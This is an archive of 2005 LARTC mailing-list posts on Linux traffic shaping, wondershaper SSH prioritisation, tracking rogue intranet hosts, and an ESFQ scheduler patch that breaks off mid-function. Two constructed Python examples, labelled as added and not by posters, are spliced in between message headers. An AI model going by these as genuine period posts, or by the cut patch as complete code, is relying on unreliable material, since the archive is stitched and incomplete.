also by using the fact that the ISP doesn't filter source IP address - meaning i can use either PPP's link assigned IP address as the source IP in the ip header.., it works for both devices.., what i want to achieve is : when uploading a large file , i could use both devices to shoot data but bound only to one source IP.
Naturally i could expect all data to go back through the device with that corresponding IP , at least that is what happens according to ethereal

From sanjeev_ravindran@linuxmail.org Tue Jan 11 11:21:15 2005
From: sanjeev_ravindran@linuxmail.org (sanjeev ravindran)
Date: Tue, 11 Jan 2005 19:21:15 +0800
Subject: [LARTC] Need help regarding TBF Token rate setting
Message-ID: <20050111112116.0AB253982EF@ws5-1.us4.outblaze.com>

Hi,

I would like to know how to specify the token rate when a tbf qdisc is created using tc tool.. Will it be
a default value when tbf qdisc is created?

This could be a silly question.... im quite new to all these stuff.. but im really interested.. any help will be most appreciated...

thanks in advance,
sanjeev

From jayesh@bol.co.tz Tue Jan 11 12:21:56 2005
From: jayesh@bol.co.tz (jayesh)
Date: Tue, 11 Jan 2005 15:21:56 +0300
Subject: [LARTC] script
Message-ID: <001301c4f7d8$24796a70$fd00000a@jayesh>

please could any one help me with a sample script to limit the uplink
i am using eth1 to connect the internet 256 kbps and eth0 64 kbps for download i would like to limit bandwidth for kazaa etc

regards
sunil

Dealing in Computers, Software and Peripherals

Jayesh Chandran
Compucat Technologies
(An associate of Milan Cable Television)
1.Goliondoi Road, Arusha.
2.Ground Floor, Serengeti Wing,
PB No. 10367, AICC, Arusha, Tanzania
jayesh@bol.co.tz
tel: fax: mobile: +255 27 2502660 +255 27 2504527 +255 748 586169
From dseshadri@broadbandmaritime.com Tue Jan 11 14:03:09 2005
From: dseshadri@broadbandmaritime.com (Deepak Seshadri)
Date: Tue, 11 Jan 2005 09:03:09 -0500
Subject: [LARTC] script
References: <001301c4f7d8$24796a70$fd00000a@jayesh>
Message-ID: <009001c4f7e6$483ef200$0500a8c0@floydian>

Hello,

Could you give me some more information about your network setup? which is your LAN interface? Which is your WAN interface?

Deepak Seshadri

----- Original Message -----
From: "jayesh"
To:
Sent: Tuesday, January 11, 2005 7:21 AM
Subject: [LARTC] script

please could any one help me with a sample script to limit the uplink
iam using eth1 to conect the internet 256 kbps and eth0 64 kbps for down load i would like to limit bandwidth for kaaza etc

regards
sunil

From Alf.Vahau@upng.ac.pg Tue Jan 11 14:28:59 2005
From: Alf.Vahau@upng.ac.pg (Alfred Vahau)
Date: Wed, 12 Jan 2005 00:28:59 +1000
Subject: [LARTC] Personal Firewalls
In-Reply-To: <1105382852.2452.2.camel@robinton.llondel.org>
References: <41E1F504.2010201@upng.ac.pg> <41E24D4E.8090409@routehat.org> <41E2CA7D.8080504@upng.ac.pg> <1105382852.2452.2.camel@robinton.llondel.org>
Message-ID: <41E3E2AB.3020905@upng.ac.pg>

We don't use a DHCP server but maybe it's an option that needs to be looked into.

Alfred,

Alfred,

David Hough wrote:

>On Mon, 2005-01-10 at 18:33, Alfred Vahau wrote:
>
>
>>Thanks for the reply. This is the practice at present. We block off one
>>IP and another pops up.
>>At times, quite a few of them appear. We suspect that some of these guys
>>are disgruntled ex-employees
>>who have unauthorized access or are accessing the network with the help
>>of other staff.
>>
>>
>
>It sounds as though you need a script tied in with your DHCP server so
>that only recognised MAC addresses get given IP addresses and only those
>addresses currently allocated get access via the firewall.
>
>

--

From Alf.Vahau@upng.ac.pg Tue Jan 11 14:39:41 2005
From: Alf.Vahau@upng.ac.pg (Alfred Vahau)
Date: Wed, 12 Jan 2005 00:39:41 +1000
Subject: [LARTC] Personal Firewalls
In-Reply-To: <41E2DBE0.7070403@routehat.org>
References: <41E1F504.2010201@upng.ac.pg> <41E24D4E.8090409@routehat.org> <41E2CA7D.8080504@upng.ac.pg> <41E2DBE0.7070403@routehat.org>
Message-ID: <41E3E52D.2050808@upng.ac.pg>

Peter Surda wrote:

> Alfred Vahau wrote:
>
>> Thanks for the reply. This is the practice at present. We block off
>> one IP and another pops up.
>> At times, quite a few of them appear. We suspect that some of these
>> guys are disgruntled ex-employees
>> who have unauthorized access or are accessing the network with the
>> help of other staff.
>
>
> Aha, so you suspect malicious intent and not only accidental
> behaviour. In that case you shouldn't expect that some other internal
> information found on the problematic computers is valid either.

We have not dismissed malicious intent. However, the chances of it happening is quite remote. Rather the fight is against network abuse. In line with the core objectives of our institution, there are sites which are defined as unproductive. It is the access to these sites for which strange ip addresses spring up, some of which are within our IP range, for which the logs do not provide very much information on the identity of the user.

>
> However, there is a possibility if you want to find the computer by
> IP, if you use manageable switches. As you know which IPs are
> improper, you can also find the corresponding MAC address passively
> from the router's ARP table (or actively by arping), and the switches
> will be able to tell you on which port this MAC is plugged. Then you
> can e.g. shutdown the port or follow the cable to the physical
> computer location.
>

Thanks for this pointer. This option looks viable and will pursue this.

>> alfred,
>
>
> Yours sincerely
> Peter Surda

alfred,

--
Perl is my reason for following the Sun;

From Alf.Vahau@upng.ac.pg Tue Jan 11 14:42:41 2005
From: Alf.Vahau@upng.ac.pg (Alfred Vahau)
Date: Wed, 12 Jan 2005 00:42:41 +1000
Subject: [LARTC] Personal Firewalls
In-Reply-To:
References:
Message-ID: <41E3E5E1.2080200@upng.ac.pg>

Thank you for these pointers. These options will be explored.

alfred,

khurram sohaib wrote:

> You can use Iptraf to monitor traffic, for further restrictions you
> can use dhcp with mac address and add those address in your forward,
> filter options in Iptables. this will solve your problem.
>
> if you need the further help for this, please let me know.
>
> khurram
>
> Message FROM KHURRAM SOHAIB.
>
> >From: Alfred Vahau
> >To: lartc@mailman.ds9a.nl
> >Subject: [LARTC] Personal Firewalls
> >Date: Mon, 10 Jan 2005 13:22:44 +1000
> >
> >Hello,
> >
> >Our ISP provides a firewall and NAT services for our Intranet.
> >However, within the Intranet, there appear to be personal firewalls
> >around some anonymous PCs. The IP addresses of these PCs can be
> >detected by our network monitoring tool.
> >The identity of the user however remains anonymous.
> >Are there any tools that can be used to penetrate the personal firewall
> >and reveal the identity of the users? All our IP addresses fall within
> >specific ranges and the existence of these addresses are against the
> >policies on computer usage.
> >
> >Thanks for any pointers,
> >
> >Alfred Vahau
> >IT Services
> >Uni. PNG
> >
> >--

--
Perl is my reason for following the Sun;

From thefirstofthechildren@yahoo.ca Tue Jan 11 14:42:39 2005
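Added example, not written by any poster in this thread: a Python version of the ARP-table check suggested in the Personal Firewalls thread above, comparing what the router has seen against the addresses that were actually assigned, so that the reported MAC can be looked up on the managed switches. The registry, the sample table (in Linux /proc/net/arp layout) and every address are constructed, and the function names are assumptions.

```python
"""Compare a router's ARP table with the list of assigned addresses."""
from collections import defaultdict

# Constructed sample in the layout of Linux /proc/net/arp (documentation addresses).
SAMPLE_ARP = """\
IP address       HW type     Flags       HW address            Mask     Device
192.0.2.10       0x1         0x2         02:00:00:00:00:10     *        eth1
192.0.2.11       0x1         0x2         02:00:00:00:00:99     *        eth1
192.0.2.50       0x1         0x2         02:00:00:00:00:99     *        eth1
192.0.2.60       0x1         0x0         00:00:00:00:00:00     *        eth1
"""

# Constructed registry of assigned addresses: IP -> MAC of the machine it was given to.
REGISTRY = {
    "192.0.2.10": "02:00:00:00:00:10",
    "192.0.2.11": "02:00:00:00:00:11",
}

ATF_COM = 0x2  # "completed entry" flag; incomplete entries carry no usable MAC


def parse_proc_net_arp(text):
    """Return (ip, mac, device) for every completed entry, skipping the header line."""
    entries = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) != 6:
            continue
        ip, _hw_type, flags, mac, _mask, dev = fields
        if int(flags, 16) & ATF_COM:
            entries.append((ip, mac.lower(), dev))
    return entries


def audit(entries, registry):
    """Flag addresses nobody was assigned, assigned addresses answered by a
    different MAC, and a single MAC answering for several addresses."""
    findings = []
    ips_by_mac = defaultdict(list)
    for ip, mac, dev in entries:
        ips_by_mac[mac].append(ip)
        assigned = registry.get(ip)
        if assigned is None:
            findings.append(("unregistered-ip", ip, mac, dev))
        elif assigned.lower() != mac:
            findings.append(("mac-mismatch", ip, mac, dev))
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            # Same machine showing up under one address after another.
            findings.append(("one-mac-many-ips", ",".join(sorted(ips)), mac, ""))
    return findings


if __name__ == "__main__":
    for kind, ip, mac, dev in audit(parse_proc_net_arp(SAMPLE_ARP), REGISTRY):
        print(f"{kind:18s} {ip:28s} {mac} {dev}")
```

A "one-mac-many-ips" finding corresponds to the "block one IP and another pops up" pattern described in the thread: the address changes while the MAC, and therefore the switch port, stays the same.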
From: thefirstofthechildren@yahoo.ca (simms)
Date: Tue, 11 Jan 2005 09:42:39 -0500
Subject: [LARTC] wondershaper with ssh on a non-standard port
In-Reply-To: <41E2FEA2.2090208@wildgooses.com>
References: <20050110194905.GM13970@queeg> <41E2FEA2.2090208@wildgooses.com>
Message-ID: <20050111144239.GA26124@queeg>

mornin' all,

i still haven't found the right solution for my situation, but after
some digging, i realized that the free PuTTY SSH client (commonly used
to access remote systems from under Windows) does NOT set the TOS bit
in a way that would let the default wondershaper script identify its
packets as high-priority.

this means that -- as suggested by Ed -- prioritizing SSH packets in the
uplink stream would have to be done on the basis of the port number used
by these packets.

also, because PuTTY does not set the TOS bit as wondershaper expects,
PuTTY users will have to use *port-based* prioritization in wondershaper
EVEN IF THEIR SSH SERVER RUNS ON THE DEFAULT PORT (22).

i will post up my solution as soon as i get it working. in the
meantime, please feel free to correct me if i'm wrong / suggest other
solutions.

peace
-p

--
Until lions have their historians, tales of the hunt shall always glorify the hunters.
- African Proverb

On Mon, 10-Jan-2005 at 22:16:02 +0000, Ed Wildgoose wrote:
> Hi,
>
> >having read the docs and the wondershaper script itself, it occurred to
> >me that the documentation promises an immediate drop in interactive app
> >latency, specifically mentioning SSH as a big winner.
> >however, looking through the script i can't really tell just *how*
> >wondershaper figures out which port my SSH daemon is running on.
> >
> >so what i'd like to know is, if i'm running my sshd on, say, port 222,
> >do i need to make any changes to the wondershaper script, or will it
> >figure out the right number automagically (e.g. from /etc/services,
> >where SSH is already correctly assigned to port 222) ?
> >(conversely, does it 'need' to figure out this port number at all?)
> >
> >
>
> It's been a while since I looked through wondershaper, but the relevant
> lines are apparently these:
>
> # TOS Minimum Delay (ssh, NOT scp) in 1:10:
>
> tc filter add dev $DEV parent 1:0 protocol ip prio 10 u32 \
> match ip tos 0x10 0xff flowid 1:10
>
> So it seems to be matching based on the "type of service" bits in the IP
> packet. I seem to remember that SSH actually sets the IP tos bits
> correctly?
>
> So it *should* work when ssh is on another port. I guess you need to
> either tweak the script (if you want a quick fix then just mark anything
> to/from port 222 as high priority), or else figure out why your packets
> aren't matching the required rule....
>
> Good luck
>
> Ed W

From andy.furniss@dsl.pipex.com Tue Jan 11 15:28:08 2005
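Added example, not part of any post in the wondershaper thread above and not wondershaper's own code: a Python emulation of the u32 keys under discussion, run over constructed packets, showing why the TOS-only filter misses SSH traffic sent with TOS 0x00 and what adding a port 222 match changes. The two port filters, the "default" label and all function names are assumptions; offsets 20 and 22 are where tc's u32 `ip sport` and `ip dport` keys read, which is only the TCP port when the IP header carries no options.

```python
"""Emulate the tc u32 keys from the wondershaper thread on constructed packets."""
import struct


def build_packet(tos, sport, dport, ip_options=b""):
    """Constructed IPv4 + TCP headers; ip_options must be a multiple of 4 bytes."""
    ihl = 5 + len(ip_options) // 4
    ip = struct.pack("!BBHHHBBH4s4s",
                     (4 << 4) | ihl, tos, ihl * 4 + 20, 0, 0, 64, 6, 0,
                     bytes([192, 0, 2, 10]), bytes([198, 51, 100, 20]))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 5680, 0, 0)
    return ip + ip_options + tcp


def u32_key(pkt, offset, width, value, mask):
    """One u32 key: mask `width` bytes at a fixed offset from the start of the IP header."""
    if len(pkt) < offset + width:
        return False
    field = int.from_bytes(pkt[offset:offset + width], "big")
    return (field & mask) == (value & mask)


# (prio, tc syntax, (offset, width, value, mask), flowid); lower prio is tested first.
TOS_FILTER = (10, "match ip tos 0x10 0xff", (1, 1, 0x10, 0xFF), "1:10")
# Assumed additions for an sshd on port 222, the example port used in the thread.
DPORT_FILTER = (11, "match ip dport 222 0xffff", (22, 2, 222, 0xFFFF), "1:10")
SPORT_FILTER = (11, "match ip sport 222 0xffff", (20, 2, 222, 0xFFFF), "1:10")


def classify(pkt, filters):
    """Return the flowid of the first matching filter, or "default" if none matches."""
    for _prio, _syntax, key, flowid in sorted(filters, key=lambda f: f[0]):
        if u32_key(pkt, *key):
            return flowid
    return "default"


# Constructed sample packets, all sent to port 222.
SAMPLES = {
    "interactive ssh, TOS 0x10 (minimum delay)": build_packet(0x10, 40000, 222),
    "ssh client that leaves TOS at 0x00": build_packet(0x00, 40001, 222),
    "bulk copy over ssh, TOS 0x08 (throughput)": build_packet(0x08, 40002, 222),
    "TOS 0x00 with 4 bytes of IP options": build_packet(0x00, 40003, 222, b"\x01" * 4),
}


def compare():
    """Class chosen for each sample with the TOS filter alone and with the port filters added."""
    tos_only = [TOS_FILTER]
    with_ports = [TOS_FILTER, DPORT_FILTER, SPORT_FILTER]
    return {name: (classify(pkt, tos_only), classify(pkt, with_ports))
            for name, pkt in SAMPLES.items()}


if __name__ == "__main__":
    for name, (tos_only, with_ports) in compare().items():
        print(f"{name:44s} tos-only -> {tos_only:8s} tos+port -> {with_ports}")
```

The port keys also lift the bulk transfer into 1:10, which is what the script's "(ssh, NOT scp)" TOS match was avoiding, so a port-based rule trades that distinction for coverage of clients that leave TOS unset.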
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Tue, 11 Jan 2005 15:28:08 +0000
Subject: [LARTC] ESFQ?
In-Reply-To: <41DBA952.5010203@expertron.co.za>
References: <20050104180442.47689.qmail@web12304.mail.yahoo.com> <41DB94DF.2070407@expertron.co.za> <41DBA339.3060407@dsl.pipex.com> <41DBA952.5010203@expertron.co.za>
Message-ID: <41E3F088.6060708@dsl.pipex.com>

Justin Schoeman wrote:
> Woohoo - that would be great!
>
> -justin
>
> Andy Furniss wrote:
>
>> Justin Schoeman wrote:
>>
>>> Ouch... Is there any other way to do host-based fair sharing (well,
>>> other than actually classifying each host :-( )?
>>
>>
>>
>> I don't think it will take much to get it to work - though I haven't
>> tried :-) .
>>
>> I'll have a look at doing a 2.6.10 in the next few days.

Well I gave it a go (first patches I've made) and they work for me though Thomas or Stephen may notice something :-) .

Hopefully they won't be needed in the future if Thomas gets esfq in mainline.

They are based on Alexander Clouters patches at www.digriz.org.uk. I only used the first iproute one. I was hampered a bit because kernel.org have turned off the diff viewer.

The remove db iproute patch is from LFS, you may not need it if you have Berkeley DB installed ( search for db_185.h ). If you don't have it *and* you don't use arpd then use the patch, it just removes arpd from the build.

Andy.
--------------010108080506010705020509 Content-Type: text/plain; name="esfq-iproute2-2.6.9-041019.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="esfq-iproute2-2.6.9-041019.patch" diff -urN iproute2-2.6.9.orig/include/linux/pkt_sched.h iproute2-2.6.9/include/linux/pkt_sched.h --- iproute2-2.6.9.orig/include/linux/pkt_sched.h 2004-10-19 21:49:02.000000000 +0100 +++ iproute2-2.6.9/include/linux/pkt_sched.h 2005-01-11 11:46:45.395401296 +0000 @@ -126,6 +126,13 @@ /* SFQ section */ +enum +{ + TCA_SFQ_HASH_CLASSIC, + TCA_SFQ_HASH_DST, + TCA_SFQ_HASH_SRC, +}; + struct tc_sfq_qopt { unsigned quantum; /* Bytes per round allocated to flow */ @@ -133,6 +140,7 @@ __u32 limit; /* Maximal packets in queue */ unsigned divisor; /* Hash divisor */ unsigned flows; /* Maximal number of flows */ + unsigned hash_kind; /* Hash function to use for flow identification */ }; /* @@ -142,6 +150,8 @@ * * The only reason for this is efficiency, it is possible * to change these parameters in compile time. + * + * If you need to play with this values use esfq */ /* RED section */ diff -urN iproute2-2.6.9.orig/tc/Makefile iproute2-2.6.9/tc/Makefile --- iproute2-2.6.9.orig/tc/Makefile 2004-10-19 21:49:02.000000000 +0100 +++ iproute2-2.6.9/tc/Makefile 2005-01-11 11:46:45.396401144 +0000 @@ -6,6 +6,7 @@ TCMODULES := TCMODULES += q_fifo.o TCMODULES += q_sfq.o +TCMODULES += q_esfq.o TCMODULES += q_red.o TCMODULES += q_prio.o TCMODULES += q_tbf.o diff -urN iproute2-2.6.9.orig/tc/q_esfq.c iproute2-2.6.9/tc/q_esfq.c --- iproute2-2.6.9.orig/tc/q_esfq.c 1970-01-01 01:00:00.000000000 +0100 +++ iproute2-2.6.9/tc/q_esfq.c 2005-01-11 11:47:29.424707824 +0000 
@@ -0,0 +1,168 @@ +/* + * q_esfq.c ESFQ. + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version + * 2 of the License, or (at your option) any later version. + * + * Authors: Alexey Kuznetsov, + * + * Changes: Alexander Atanasov, + * Added depth,limit,divisor,hash_kind options. + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "utils.h" +#include "tc_util.h" + +static void explain(void) +{ + fprintf(stderr, "Usage: ... esfq [ perturb SECS ] [ quantum BYTES ] [ depth FLOWS ]\n\t[ divisor HASHBITS ] [ limit PKTS ] [ hash HASHTYPE]\n"); + fprintf(stderr,"Where: \n"); + fprintf(stderr,"HASHTYPE := { classic | src | dst }\n"); +} + +#define usage() return(-1) + +static int esfq_parse_opt(struct qdisc_util *qu, int argc, char **argv, struct nlmsghdr *n) +{ + int ok=0; + struct tc_sfq_qopt opt; + + memset(&opt, 0, sizeof(opt)); + + opt.hash_kind= TCA_SFQ_HASH_CLASSIC; + + while (argc > 0) { + if (strcmp(*argv, "quantum") == 0) { + NEXT_ARG(); + if (get_size(&opt.quantum, *argv)) { + fprintf(stderr, "Illegal \"quantum\"\n"); + return -1; + } + ok++; + } else if (strcmp(*argv, "perturb") == 0) { + NEXT_ARG(); + if (get_integer(&opt.perturb_period, *argv, 0)) { + fprintf(stderr, "Illegal \"perturb\"\n"); + return -1; + } + ok++; + } else if (strcmp(*argv, "depth") == 0) { + NEXT_ARG(); + if (get_integer(&opt.flows, *argv, 0)) { + fprintf(stderr, "Illegal \"depth\"\n"); + return -1; + } + ok++; + } else if (strcmp(*argv, "divisor") == 0) { + NEXT_ARG(); + if (get_integer(&opt.divisor, *argv, 0)) { + fprintf(stderr, "Illegal \"divisor\"\n"); + return -1; + } + if(opt.divisor >= 15) { + fprintf(stderr, "Illegal \"divisor\" must be < 15\n"); + return -1; + } + opt.divisor=pow(2,opt.divisor); + ok++; + } else if (strcmp(*argv, "limit") == 0) { + NEXT_ARG(); + if 
(get_integer(&opt.limit, *argv, 0)) { + fprintf(stderr, "Illegal \"limit\"\n"); + return -1; + } + ok++; + } else if (strcmp(*argv, "hash") == 0) { + NEXT_ARG(); + if(strcmp(*argv,"classic") == 0) { + opt.hash_kind= TCA_SFQ_HASH_CLASSIC; + } else + if(strcmp(*argv,"dst") == 0) { + opt.hash_kind= TCA_SFQ_HASH_DST; + } else + if(strcmp(*argv,"src") == 0) { + opt.hash_kind= TCA_SFQ_HASH_SRC; + } else { + fprintf(stderr, "Illegal \"hash\"\n"); + explain(); + return -1; + } + ok++; + } else if (strcmp(*argv, "help") == 0) { + explain(); + return -1; + } else { + fprintf(stderr, "What is \"%s\"?\n", *argv); + explain(); + return -1; + } + argc--; argv++; + } + + if (ok) + addattr_l(n, 1024, TCA_OPTIONS, &opt, sizeof(opt)); + return 0; +} + +static int esfq_print_opt(struct qdisc_util *qu, FILE *f, struct rtattr *opt) +{ + struct tc_sfq_qopt *qopt; + SPRINT_BUF(b1); + + if (opt == NULL) + return 0; + + if (RTA_PAYLOAD(opt) < sizeof(*qopt)) + return -1; + qopt = RTA_DATA(opt); + fprintf(f, "quantum %s ", sprint_size(qopt->quantum, b1)); + if (show_details) { + fprintf(f, "limit %up flows %u/%u ", + qopt->limit, qopt->flows, qopt->divisor); + } + if (qopt->perturb_period) + fprintf(f, "perturb %dsec ", qopt->perturb_period); + + fprintf(f,"hash: "); + switch(qopt->hash_kind) + { + case TCA_SFQ_HASH_CLASSIC: + fprintf(f,"classic"); + break; + case TCA_SFQ_HASH_DST: + fprintf(f,"dst"); + break; + case TCA_SFQ_HASH_SRC: + fprintf(f,"src"); + break; + default: + fprintf(f,"Unknown"); + } + return 0; +} + +static int esfq_print_xstats(struct qdisc_util *qu, FILE *f, struct rtattr *xstats) +{ + return 0; +} + + +struct qdisc_util esfq_qdisc_util = { + .id = "esfq", + .parse_qopt = esfq_parse_opt, + .print_qopt = esfq_print_opt, + .print_xstats = esfq_print_xstats, +}; --------------010108080506010705020509 Content-Type: text/plain; name="esfq-kernel-2.6.10.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="esfq-kernel-2.6.10.patch" diff -urN 
linux-2.6.10.orig/include/linux/pkt_sched.h linux-2.6.10/include/linux/pkt_sched.h --- linux-2.6.10.orig/include/linux/pkt_sched.h Fri Dec 24 21:35:23 2004 +++ linux-2.6.10/include/linux/pkt_sched.h Mon Jan 10 15:32:43 2005 @@ -129,6 +129,13 @@ /* SFQ section */ +enum +{ + TCA_SFQ_HASH_CLASSIC, + TCA_SFQ_HASH_DST, + TCA_SFQ_HASH_SRC, +}; + struct tc_sfq_qopt { unsigned quantum; /* Bytes per round allocated to flow */ @@ -136,6 +143,7 @@ __u32 limit; /* Maximal packets in queue */ unsigned divisor; /* Hash divisor */ unsigned flows; /* Maximal number of flows */ + unsigned hash_kind; /* Hash function to use for flow identification */ }; /* @@ -145,6 +153,8 @@ * * The only reason for this is efficiency, it is possible * to change these parameters in compile time. + * + * If you need to play with this values use esfq. */ /* RED section */ diff -urN linux-2.6.10.orig/net/sched/Kconfig linux-2.6.10/net/sched/Kconfig --- linux-2.6.10.orig/net/sched/Kconfig Fri Dec 24 21:35:27 2004 +++ linux-2.6.10/net/sched/Kconfig Mon Jan 10 15:32:43 2005 
@@ -154,6 +154,24 @@ To compile this code as a module, choose M here: the module will be called sch_sfq. +config NET_SCH_ESFQ + tristate "ESFQ queue" + depends on NET_SCHED + ---help--- + Say Y here if you want to use the Enhanced Stochastic Fairness + Queueing (ESFQ) packet scheduling algorithm for some of your network + devices or as a leaf discipline for the CBQ scheduling algorithm (see + the top of for details and references + about the SFQ algorithm). + + This is an enchanced SFQ version which allows you to control the + hardcoded values in the SFQ scheduler: queue depth, hash table size, + queues limit. Also adds control to the hash function used to identify + packet flows. Hash by src or dst ip and original sfq hash. + + To compile this code as a module, choose M here: the + module will be called sch_esfq. + config NET_SCH_TEQL tristate "TEQL queue" depends on NET_SCHED diff -urN linux-2.6.10.orig/net/sched/Makefile linux-2.6.10/net/sched/Makefile --- linux-2.6.10.orig/net/sched/Makefile Fri Dec 24 21:34:45 2004 +++ linux-2.6.10/net/sched/Makefile Mon Jan 10 15:32:43 2005 @@ -22,6 +22,7 @@ obj-$(CONFIG_NET_SCH_INGRESS) += sch_ingress.o obj-$(CONFIG_NET_SCH_DSMARK) += sch_dsmark.o obj-$(CONFIG_NET_SCH_SFQ) += sch_sfq.o +obj-$(CONFIG_NET_SCH_ESFQ) += sch_esfq.o obj-$(CONFIG_NET_SCH_TBF) += sch_tbf.o obj-$(CONFIG_NET_SCH_TEQL) += sch_teql.o obj-$(CONFIG_NET_SCH_PRIO) += sch_prio.o diff -urN linux-2.6.10.orig/net/sched/sch_esfq.c linux-2.6.10/net/sched/sch_esfq.c --- linux-2.6.10.orig/net/sched/sch_esfq.c Thu Jan 1 01:00:00 1970 +++ linux-2.6.10/net/sched/sch_esfq.c Mon Jan 10 22:40:09 2005 
@@ -0,0 +1,585 @@ +/* + * net/sched/sch_esfq.c Extended Stochastic Fairness Queueing discipline. + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version + * 2 of the License, or (at your option) any later version. + * + * Authors: Alexey Kuznetsov, + * + * Changes: Alexander Atanasov, + * Added dynamic depth,limit,divisor,hash_kind options. + * Added dst and src hashes. + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +/* Stochastic Fairness Queuing algorithm. + For more comments look at sch_sfq.c. + The difference is that you can change limit, depth, + hash table size and choose 3 hash types. + + classic: same as in sch_sfq.c + dst: destination IP address + src: source IP address + + TODO: + make sfq_change work. 
+*/ + + +/* This type should contain at least SFQ_DEPTH*2 values */ +typedef unsigned int esfq_index; + +struct esfq_head +{ + esfq_index next; + esfq_index prev; +}; + +struct esfq_sched_data +{ +/* Parameters */ + int perturb_period; + unsigned quantum; /* Allotment per round: MUST BE >= MTU */ + int limit; + unsigned depth; + unsigned hash_divisor; + unsigned hash_kind; +/* Variables */ + struct timer_list perturb_timer; + int perturbation; + esfq_index tail; /* Index of current slot in round */ + esfq_index max_depth; /* Maximal depth */ + + esfq_index *ht; /* Hash table */ + esfq_index *next; /* Active slots link */ + short *allot; /* Current allotment per slot */ + unsigned short *hash; /* Hash value indexed by slots */ + struct sk_buff_head *qs; /* Slot queue */ + struct esfq_head *dep; /* Linked list of slots, indexed by depth */ +}; + +static __inline__ unsigned esfq_hash_u32(struct esfq_sched_data *q,u32 h) +{ + int pert = q->perturbation; + + if (pert) + h = (h<>(0x1F - pert)); + + h = ntohl(h) * 2654435761UL; + return h & (q->hash_divisor-1); +} + +static __inline__ unsigned esfq_fold_hash_classic(struct esfq_sched_data *q, u32 h, u32 h1) +{ + int pert = q->perturbation; + + /* Have we any rotation primitives? If not, WHY? 
*/ + h ^= (h1<>(0x1F - pert)); + h ^= h>>10; + return h & (q->hash_divisor-1); +} + +static unsigned esfq_hash(struct esfq_sched_data *q, struct sk_buff *skb) +{ + u32 h, h2; + u32 hs; + + switch (skb->protocol) { + case __constant_htons(ETH_P_IP): + { + struct iphdr *iph = skb->nh.iph; + h = iph->daddr; + hs = iph->saddr; + h2 = hs^iph->protocol; + if (!(iph->frag_off&htons(IP_MF|IP_OFFSET)) && + (iph->protocol == IPPROTO_TCP || + iph->protocol == IPPROTO_UDP || + iph->protocol == IPPROTO_ESP)) + h2 ^= *(((u32*)iph) + iph->ihl); + break; + } + case __constant_htons(ETH_P_IPV6): + { + struct ipv6hdr *iph = skb->nh.ipv6h; + h = iph->daddr.s6_addr32[3]; + hs = iph->saddr.s6_addr32[3]; + h2 = hs^iph->nexthdr; + if (iph->nexthdr == IPPROTO_TCP || + iph->nexthdr == IPPROTO_UDP || + iph->nexthdr == IPPROTO_ESP) + h2 ^= *(u32*)&iph[1]; + break; + } + default: + h = (u32)(unsigned long)skb->dst; + hs = (u32)(unsigned long)skb->sk; + h2 = hs^skb->protocol; + } + switch(q->hash_kind) + { + case TCA_SFQ_HASH_CLASSIC: + return esfq_fold_hash_classic(q, h, h2); + case TCA_SFQ_HASH_DST: + return esfq_hash_u32(q,h); + case TCA_SFQ_HASH_SRC: + return esfq_hash_u32(q,hs); + default: + if (net_ratelimit()) + printk(KERN_DEBUG "esfq unknown hash method, fallback to classic\n"); + } + return esfq_fold_hash_classic(q, h, h2); +} + +static inline void esfq_link(struct esfq_sched_data *q, esfq_index x) +{ + esfq_index p, n; + int d = q->qs[x].qlen + q->depth; + + p = d; + n = q->dep[d].next; + q->dep[x].next = n; + q->dep[x].prev = p; + q->dep[p].next = q->dep[n].prev = x; +} + +static inline void esfq_dec(struct esfq_sched_data *q, esfq_index x) +{ + esfq_index p, n; + + n = q->dep[x].next; + p = q->dep[x].prev; + q->dep[p].next = n; + q->dep[n].prev = p; + + if (n == p && q->max_depth == q->qs[x].qlen + 1) + q->max_depth--; + + esfq_link(q, x); +} + +static inline void esfq_inc(struct esfq_sched_data *q, esfq_index x) +{ + esfq_index p, n; + int d; + + n = q->dep[x].next; + p = 
q->dep[x].prev; + q->dep[p].next = n; + q->dep[n].prev = p; + d = q->qs[x].qlen; + if (q->max_depth < d) + q->max_depth = d; + + esfq_link(q, x); +} + +static unsigned int esfq_drop(struct Qdisc *sch) +{ + struct esfq_sched_data *q = qdisc_priv(sch); + esfq_index d = q->max_depth; + struct sk_buff *skb; + unsigned int len; + + /* Queue is full! Find the longest slot and + drop a packet from it */ + + if (d > 1) { + esfq_index x = q->dep[d+q->depth].next; + skb = q->qs[x].prev; + len = skb->len; + __skb_unlink(skb, &q->qs[x]); + kfree_skb(skb); + esfq_dec(q, x); + sch->q.qlen--; + sch->qstats.drops++; + return len; + } + + if (d == 1) { + /* It is difficult to believe, but ALL THE SLOTS HAVE LENGTH 1. */ + d = q->next[q->tail]; + q->next[q->tail] = q->next[d]; + q->allot[q->next[d]] += q->quantum; + skb = q->qs[d].prev; + len = skb->len; + __skb_unlink(skb, &q->qs[d]); + kfree_skb(skb); + esfq_dec(q, d); + sch->q.qlen--; + q->ht[q->hash[d]] = q->depth; + sch->qstats.drops++; + return len; + } + + return 0; +} + +static int +esfq_enqueue(struct sk_buff *skb, struct Qdisc* sch) +{ + struct esfq_sched_data *q = qdisc_priv(sch); + unsigned hash = esfq_hash(q, skb); + unsigned depth = q->depth; + esfq_index x; + + x = q->ht[hash]; + if (x == depth) { + q->ht[hash] = x = q->dep[depth].next; + q->hash[x] = hash; + } + __skb_queue_tail(&q->qs[x], skb); + esfq_inc(q, x); + if (q->qs[x].qlen == 1) { /* The flow is new */ + if (q->tail == depth) { /* It is the first flow */ + q->tail = x; + q->next[x] = x; + q->allot[x] = q->quantum; + } else { + q->next[x] = q->next[q->tail]; + q->next[q->tail] = x; + q->tail = x; + } + } + if (++sch->q.qlen < q->limit-1) { + sch->bstats.bytes += skb->len; + sch->bstats.packets++; + return 0; + } + + esfq_drop(sch); + return NET_XMIT_CN; +} + +static int +esfq_requeue(struct sk_buff *skb, struct Qdisc* sch) +{ + struct esfq_sched_data *q = qdisc_priv(sch); + unsigned hash = 